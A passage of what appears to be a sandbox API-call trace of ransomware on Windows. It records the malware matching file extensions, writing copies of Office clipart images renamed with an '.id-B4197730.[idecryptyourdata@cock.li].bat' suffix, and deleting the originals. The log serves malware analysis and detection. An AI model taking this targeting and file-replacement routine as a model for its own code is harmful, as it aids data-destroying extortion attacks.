(lpString=".pdf") returned 4 [0069.870] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.870] lstrlenW (lpString=".xls") returned 4 [0069.870] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.870] lstrlenW (lpString=".xlsx") returned 5 [0069.870] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0069.870] lstrlenW (lpString=".ppt") returned 4 [0069.870] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF") returned 68 [0069.870] lstrlenW (lpString=".zip") returned 4 [0069.870] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.870] lstrlenW (lpString=".rar") returned 4 [0069.870] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.870] lstrlenW (lpString=".bz2") returned 4 [0069.870] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.870] lstrlenW (lpString=".7z") returned 3 [0069.870] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF") returned 68 [0069.870] lstrlenW (lpString=".dbf") returned 4 [0069.870] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF") returned 68 [0069.870] lstrlenW (lpString=".1cd") returned 4 [0069.871] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF") returned 68 [0069.871] lstrlenW (lpString=".jpg") returned 4 [0069.871] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.871] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.871] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099187.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0069.872] GetLastError () returned 0x0 [0069.872] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x5fd0, lpOverlapped=0x0) returned 1 [0069.896] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x5fe0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x5fe0, lpOverlapped=0x0) returned 1 [0069.897] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.897] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.897] SetEndOfFile (hFile=0x308) returned 1 [0069.898] CloseHandle (hObject=0x308) returned 1 [0069.898] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.898] SetEndOfFile (hFile=0x370) returned 1 [0069.899] CloseHandle (hObject=0x370) returned 1 [0069.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.899] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099187.jpg")) returned 1 [0069.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG") returned 68 [0069.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG") returned 68 [0069.899] lstrlenW (lpString=".doc") returned 4 [0069.899] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.899] lstrlenW (lpString=".docx") returned 5 [0069.899] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0069.899] lstrlenW (lpString=".pdf") returned 4 [0069.899] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.899] lstrlenW (lpString=".xls") returned 4 [0069.900] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.900] lstrlenW (lpString=".xlsx") returned 5 [0069.900] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0069.900] lstrlenW (lpString=".ppt") returned 4 [0069.900] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG") returned 68 [0069.900] lstrlenW (lpString=".zip") returned 4 [0069.900] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.900] lstrlenW (lpString=".rar") returned 4 [0069.900] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.900] lstrlenW (lpString=".bz2") returned 4 [0069.900] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.900] lstrlenW (lpString=".7z") returned 3 [0069.900] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG") returned 68 [0069.900] lstrlenW (lpString=".dbf") returned 4 [0069.900] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG") returned 68 [0069.900] lstrlenW (lpString=".1cd") returned 4 [0069.900] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG") returned 68 [0069.900] lstrlenW (lpString=".jpg") returned 4 [0069.900] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.900] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.900] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099188.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0069.901] GetLastError () returned 0x0 [0069.901] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2378, lpOverlapped=0x0) returned 1 [0069.989] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2380, lpOverlapped=0x0) returned 1 [0069.990] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.990] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.990] SetEndOfFile (hFile=0x308) returned 1 [0069.990] CloseHandle (hObject=0x308) returned 1 [0069.990] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.990] SetEndOfFile (hFile=0x370) returned 1 [0069.991] CloseHandle (hObject=0x370) returned 1 [0069.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.991] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099188.jpg")) returned 1 [0069.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG") returned 68 [0069.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG") returned 68 [0069.992] lstrlenW (lpString=".doc") returned 4 [0069.992] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.992] lstrlenW (lpString=".docx") returned 5 [0069.992] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0069.992] lstrlenW (lpString=".pdf") returned 4 [0069.992] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.992] lstrlenW (lpString=".xls") returned 4 [0069.992] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.992] lstrlenW (lpString=".xlsx") returned 5 [0069.992] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0069.992] lstrlenW (lpString=".ppt") returned 4 [0069.992] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG") returned 68 [0069.992] lstrlenW (lpString=".zip") returned 4 [0069.992] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.992] lstrlenW (lpString=".rar") returned 4 [0069.992] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.992] lstrlenW (lpString=".bz2") returned 4 [0069.992] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.992] lstrlenW (lpString=".7z") returned 3 [0069.992] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG") returned 68 [0069.992] lstrlenW (lpString=".dbf") returned 4 [0069.992] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG") returned 68 [0069.992] lstrlenW (lpString=".1cd") returned 4 [0069.993] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG") returned 68 [0069.993] lstrlenW (lpString=".jpg") returned 4 [0069.993] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.993] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.993] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099192.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0069.993] GetLastError () returned 0x0 [0069.993] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x462c, lpOverlapped=0x0) returned 1 [0070.034] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x4630, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x4630, lpOverlapped=0x0) returned 1 [0070.035] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.035] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.035] SetEndOfFile (hFile=0x308) returned 1 [0070.035] CloseHandle (hObject=0x308) returned 1 [0070.035] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.035] SetEndOfFile (hFile=0x370) returned 1 [0070.036] CloseHandle (hObject=0x370) returned 1 [0070.036] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.036] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099192.gif")) returned 1 [0070.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF") returned 68 [0070.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF") returned 68 [0070.037] lstrlenW (lpString=".doc") returned 4 [0070.037] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.037] lstrlenW (lpString=".docx") returned 5 [0070.037] lstrcmpiW (lpString1=".docx", lpString2="2.GIF") returned -1 [0070.037] lstrlenW (lpString=".pdf") returned 4 [0070.037] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.037] lstrlenW (lpString=".xls") returned 4 [0070.037] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.037] lstrlenW (lpString=".xlsx") returned 5 [0070.037] lstrcmpiW (lpString1=".xlsx", lpString2="2.GIF") returned -1 [0070.037] lstrlenW (lpString=".ppt") returned 4 [0070.037] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF") returned 68 [0070.037] lstrlenW (lpString=".zip") returned 4 [0070.037] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.037] lstrlenW (lpString=".rar") returned 4 [0070.037] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.037] lstrlenW (lpString=".bz2") returned 4 [0070.037] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.037] lstrlenW (lpString=".7z") returned 3 [0070.037] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF") returned 68 [0070.037] lstrlenW (lpString=".dbf") returned 4 [0070.038] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF") returned 68 [0070.038] lstrlenW (lpString=".1cd") returned 4 [0070.038] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099192.GIF") returned 68 [0070.038] lstrlenW (lpString=".jpg") returned 4 [0070.038] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.038] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.038] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099194.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0070.038] GetLastError () returned 0x0 [0070.039] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x62b1, lpOverlapped=0x0) returned 1 [0070.050] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x62c0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x62c0, lpOverlapped=0x0) returned 1 [0070.051] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.051] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.051] SetEndOfFile (hFile=0x308) returned 1 [0070.053] CloseHandle (hObject=0x308) returned 1 [0070.053] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.053] SetEndOfFile (hFile=0x370) returned 1 [0070.056] CloseHandle (hObject=0x370) returned 1 [0070.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099194.gif")) returned 1 [0070.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF") returned 68 [0070.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF") returned 68 [0070.057] lstrlenW (lpString=".doc") returned 4 [0070.057] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.057] lstrlenW (lpString=".docx") returned 5 [0070.057] lstrcmpiW (lpString1=".docx", lpString2="4.GIF") returned -1 [0070.057] lstrlenW (lpString=".pdf") returned 4 [0070.057] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.057] lstrlenW (lpString=".xls") returned 4 [0070.057] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.057] lstrlenW (lpString=".xlsx") returned 5 [0070.057] lstrcmpiW (lpString1=".xlsx", lpString2="4.GIF") returned -1 [0070.057] lstrlenW (lpString=".ppt") returned 4 [0070.057] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF") returned 68 [0070.057] lstrlenW (lpString=".zip") returned 4 [0070.058] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.058] lstrlenW (lpString=".rar") returned 4 [0070.058] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.058] lstrlenW (lpString=".bz2") returned 4 [0070.058] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.058] lstrlenW (lpString=".7z") returned 3 [0070.058] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF") returned 68 [0070.058] lstrlenW (lpString=".dbf") returned 4 [0070.058] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF") returned 68 [0070.058] lstrlenW (lpString=".1cd") returned 4 [0070.058] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF") returned 68 [0070.058] lstrlenW (lpString=".jpg") returned 4 [0070.058] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.058] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.058] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099197.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.059] GetLastError () returned 0x0 [0070.059] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2a92, lpOverlapped=0x0) returned 1 [0070.068] WriteFile (in: hFile=0x36c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2aa0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2aa0, lpOverlapped=0x0) returned 1 [0070.069] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.069] WriteFile (in: hFile=0x36c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.069] SetEndOfFile (hFile=0x36c) returned 1 [0070.070] CloseHandle (hObject=0x36c) returned 1 [0070.070] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.070] SetEndOfFile (hFile=0x370) returned 1 [0070.071] CloseHandle (hObject=0x370) returned 1 [0070.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099197.gif")) returned 1 [0070.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF") returned 68 [0070.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF") returned 68 [0070.071] lstrlenW (lpString=".doc") returned 4 [0070.071] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.071] lstrlenW (lpString=".docx") returned 5 [0070.071] lstrcmpiW (lpString1=".docx", lpString2="7.GIF") returned -1 [0070.071] lstrlenW (lpString=".pdf") returned 4 [0070.071] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.072] lstrlenW (lpString=".xls") returned 4 [0070.072] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.072] lstrlenW (lpString=".xlsx") returned 5 [0070.072] lstrcmpiW (lpString1=".xlsx", lpString2="7.GIF") returned -1 [0070.072] lstrlenW (lpString=".ppt") returned 4 [0070.072] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF") returned 68 [0070.072] lstrlenW (lpString=".zip") returned 4 [0070.072] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.072] lstrlenW (lpString=".rar") returned 4 [0070.072] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.072] lstrlenW (lpString=".bz2") returned 4 [0070.072] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.072] lstrlenW (lpString=".7z") returned 3 [0070.072] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF") returned 68 [0070.072] lstrlenW (lpString=".dbf") returned 4 [0070.072] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF") returned 68 [0070.072] lstrlenW (lpString=".1cd") returned 4 [0070.072] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF") returned 68 [0070.072] lstrlenW (lpString=".jpg") returned 4 [0070.072] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.078] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.079] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099199.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 